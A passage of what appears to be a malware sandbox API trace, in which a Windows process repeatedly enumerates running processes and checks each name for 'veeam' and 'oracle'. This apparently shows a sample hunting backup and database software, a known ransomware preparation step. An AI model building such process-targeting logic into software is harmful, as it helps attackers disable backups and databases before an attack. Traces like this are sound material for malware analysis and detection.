lstrcpyA (in: lpString1=0x567fabc, lpString2="taskhostw.exe" | out: lpString1="taskhostw.exe") returned="taskhostw.exe" [0092.087] StrStrIA (lpFirst="taskhostw.exe", lpSrch="veeam") returned 0x0 [0092.087] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0092.088] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0092.088] LocalAlloc (uFlags=0x40, uBytes=0x17) returned 0x3543038 [0092.089] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="UNPCampaignManager.exe", cchWideChar=-1, lpMultiByteStr=0x3543038, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UNPCampaignManager.exe", lpUsedDefaultChar=0x0) returned 23 [0092.089] lstrcpyA (in: lpString1=0x567fabc, lpString2="UNPCampaignManager.exe" | out: lpString1="UNPCampaignManager.exe") returned="UNPCampaignManager.exe" [0092.089] StrStrIA (lpFirst="UNPCampaignManager.exe", lpSrch="veeam") returned 0x0 [0092.089] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x122c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0092.090] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0092.090] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3543058 [0092.090] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="DeviceCensus.exe", cchWideChar=-1, lpMultiByteStr=0x3543058, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DeviceCensus.exe", lpUsedDefaultChar=0x0) returned 17 [0092.090] lstrcpyA (in: lpString1=0x567fabc, lpString2="DeviceCensus.exe" | out: lpString1="DeviceCensus.exe") returned="DeviceCensus.exe" [0092.090] StrStrIA (lpFirst="DeviceCensus.exe", lpSrch="veeam") returned 0x0 [0092.090] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1234, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3ac, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0092.092] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0092.092] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x355ca60 [0092.092] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="AppHostRegistrationVerifier.exe", cchWideChar=-1, lpMultiByteStr=0x355ca60, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppHostRegistrationVerifier.exe", lpUsedDefaultChar=0x0) returned 32 [0092.092] lstrcpyA (in: lpString1=0x567fabc, lpString2="AppHostRegistrationVerifier.exe" | out: lpString1="AppHostRegistrationVerifier.exe") returned="AppHostRegistrationVerifier.exe" [0092.092] StrStrIA (lpFirst="AppHostRegistrationVerifier.exe", lpSrch="veeam") returned 0x0 [0092.092] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x122c, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0092.094] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.094] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3542b48 [0092.094] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x3542b48, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0092.094] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0092.094] StrStrIA (lpFirst="conhost.exe", lpSrch="veeam") returned 0x0 [0092.094] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1210, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0092.095] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.095] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3542b78 [0092.095] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="conhost.exe", cchWideChar=-1, lpMultiByteStr=0x3542b78, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="conhost.exe", lpUsedDefaultChar=0x0) returned 12 [0092.095] lstrcpyA (in: lpString1=0x567fabc, lpString2="conhost.exe" | out: lpString1="conhost.exe") returned="conhost.exe" [0092.095] StrStrIA (lpFirst="conhost.exe", lpSrch="veeam") returned 0x0 [0092.095] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1348, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0092.097] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.097] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3542cc8 [0092.097] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3542cc8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0092.097] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0092.097] StrStrIA (lpFirst="svchost.exe", lpSrch="veeam") returned 0x0 [0092.097] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="rxodge.exe")) returned 1 [0092.098] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0092.098] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3542c80 [0092.098] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="rxodge.exe", cchWideChar=-1, lpMultiByteStr=0x3542c80, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="rxodge.exe", lpUsedDefaultChar=0x0) returned 11 [0092.098] lstrcpyA (in: lpString1=0x567fabc, lpString2="rxodge.exe" | out: lpString1="rxodge.exe") returned="rxodge.exe" [0092.098] StrStrIA (lpFirst="rxodge.exe", lpSrch="veeam") returned 0x0 [0092.098] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0092.100] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0092.100] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3542c50 [0092.100] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="sppsvc.exe", cchWideChar=-1, lpMultiByteStr=0x3542c50, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sppsvc.exe", lpUsedDefaultChar=0x0) returned 11 [0092.100] lstrcpyA (in: lpString1=0x567fabc, lpString2="sppsvc.exe" | out: lpString1="sppsvc.exe") returned="sppsvc.exe" [0092.100] StrStrIA (lpFirst="sppsvc.exe", lpSrch="veeam") returned 0x0 [0092.100] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 0 [0092.101] CloseHandle (hObject=0x358) returned 1 [0092.101] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x350 [0092.127] Process32FirstW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0092.128] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0092.128] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x3542e38 [0092.128] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="[System Process]", cchWideChar=-1, lpMultiByteStr=0x3542e38, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[System Process]", lpUsedDefaultChar=0x0) returned 17 [0092.128] lstrcpyA (in: lpString1=0x567fabc, lpString2="[System Process]" | out: lpString1="[System Process]") returned="[System Process]" [0092.128] StrStrIA (lpFirst="[System Process]", lpSrch="oracle") returned 0x0 [0092.129] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6b, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0092.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0092.130] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x35477f8 [0092.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="System", cchWideChar=-1, lpMultiByteStr=0x35477f8, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="System", lpUsedDefaultChar=0x0) returned 7 [0092.130] lstrcpyA (in: lpString1=0x567fabc, lpString2="System" | out: lpString1="System") returned="System" [0092.130] StrStrIA (lpFirst="System", lpSrch="oracle") returned 0x0 [0092.130] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0092.131] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0092.131] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3542bf0 [0092.131] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="smss.exe", cchWideChar=-1, lpMultiByteStr=0x3542bf0, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smss.exe", lpUsedDefaultChar=0x0) returned 9 [0092.131] lstrcpyA (in: lpString1=0x567fabc, lpString2="smss.exe" | out: lpString1="smss.exe") returned="smss.exe" [0092.131] StrStrIA (lpFirst="smss.exe", lpSrch="oracle") returned 0x0 [0092.131] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0092.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0092.133] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3542d40 [0092.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x3542d40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0092.133] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0092.133] StrStrIA (lpFirst="csrss.exe", lpSrch="oracle") returned 0x0 [0092.133] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0092.134] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.134] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3542cb0 [0092.134] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="wininit.exe", cchWideChar=-1, lpMultiByteStr=0x3542cb0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="wininit.exe", lpUsedDefaultChar=0x0) returned 12 [0092.134] lstrcpyA (in: lpString1=0x567fabc, lpString2="wininit.exe" | out: lpString1="wininit.exe") returned="wininit.exe" [0092.135] StrStrIA (lpFirst="wininit.exe", lpSrch="oracle") returned 0x0 [0092.135] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0092.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0092.136] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3542cf8 [0092.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="csrss.exe", cchWideChar=-1, lpMultiByteStr=0x3542cf8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="csrss.exe", lpUsedDefaultChar=0x0) returned 10 [0092.136] lstrcpyA (in: lpString1=0x567fabc, lpString2="csrss.exe" | out: lpString1="csrss.exe") returned="csrss.exe" [0092.136] StrStrIA (lpFirst="csrss.exe", lpSrch="oracle") returned 0x0 [0092.136] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0092.137] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0092.137] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3542b90 [0092.137] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="winlogon.exe", cchWideChar=-1, lpMultiByteStr=0x3542b90, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winlogon.exe", lpUsedDefaultChar=0x0) returned 13 [0092.137] lstrcpyA (in: lpString1=0x567fabc, lpString2="winlogon.exe" | out: lpString1="winlogon.exe") returned="winlogon.exe" [0092.137] StrStrIA (lpFirst="winlogon.exe", lpSrch="oracle") returned 0x0 [0092.137] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0092.139] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0092.139] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3542d10 [0092.139] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="services.exe", cchWideChar=-1, lpMultiByteStr=0x3542d10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="services.exe", lpUsedDefaultChar=0x0) returned 13 [0092.139] lstrcpyA (in: lpString1=0x567fabc, lpString2="services.exe" | out: lpString1="services.exe") returned="services.exe" [0092.139] StrStrIA (lpFirst="services.exe", lpSrch="oracle") returned 0x0 [0092.139] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0092.140] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0092.140] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3542c98 [0092.140] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lsass.exe", cchWideChar=-1, lpMultiByteStr=0x3542c98, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lsass.exe", lpUsedDefaultChar=0x0) returned 10 [0092.140] lstrcpyA (in: lpString1=0x567fabc, lpString2="lsass.exe" | out: lpString1="lsass.exe") returned="lsass.exe" [0092.140] StrStrIA (lpFirst="lsass.exe", lpSrch="oracle") returned 0x0 [0092.140] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0092.142] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.142] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3542ce0 [0092.142] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3542ce0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0092.142] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0092.142] StrStrIA (lpFirst="svchost.exe", lpSrch="oracle") returned 0x0 [0092.142] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0092.144] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0092.144] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3542c68 [0092.144] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x3542c68, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0092.144] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0092.144] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="oracle") returned 0x0 [0092.144] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0092.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0092.145] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3542bc0 [0092.145] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fontdrvhost.exe", cchWideChar=-1, lpMultiByteStr=0x3542bc0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fontdrvhost.exe", lpUsedDefaultChar=0x0) returned 16 [0092.145] lstrcpyA (in: lpString1=0x567fabc, lpString2="fontdrvhost.exe" | out: lpString1="fontdrvhost.exe") returned="fontdrvhost.exe" [0092.145] StrStrIA (lpFirst="fontdrvhost.exe", lpSrch="oracle") returned 0x0 [0092.145] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0092.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.147] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3542d28 [0092.147] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x3542d28, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 12 [0092.147] lstrcpyA (in: lpString1=0x567fabc, lpString2="svchost.exe" | out: lpString1="svchost.exe") returned="svchost.exe" [0092.147] StrStrIA (lpFirst="svchost.exe", lpSrch="oracle") returned 0x0 [0092.147] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0092.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0092.148] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x35477a8 [0092.148] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="dwm.exe", cchWideChar=-1, lpMultiByteStr=0x35477a8, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwm.exe", lpUsedDefaultChar=0x0) returned 8 [0092.148] lstrcpyA (in: lpString1=0x567fabc, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0092.148] StrStrIA (lpFirst="dwm.exe", lpSrch="oracle") returned 0x0 [0092.149] Process32NextW (in: hSnapshot=0x350, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x60, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0092.150] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="svchost.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0092.150] 